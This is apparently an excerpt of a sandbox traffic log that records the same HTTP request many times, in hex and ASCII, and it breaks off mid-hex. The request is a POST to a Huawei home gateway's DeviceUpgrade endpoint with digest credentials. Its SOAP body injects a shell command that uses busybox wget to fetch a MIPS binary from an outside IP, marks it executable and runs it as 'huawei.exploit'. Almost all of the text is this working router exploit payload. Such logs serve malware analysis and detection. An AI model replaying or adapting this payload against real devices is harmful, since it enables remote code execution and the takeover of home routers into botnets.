3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 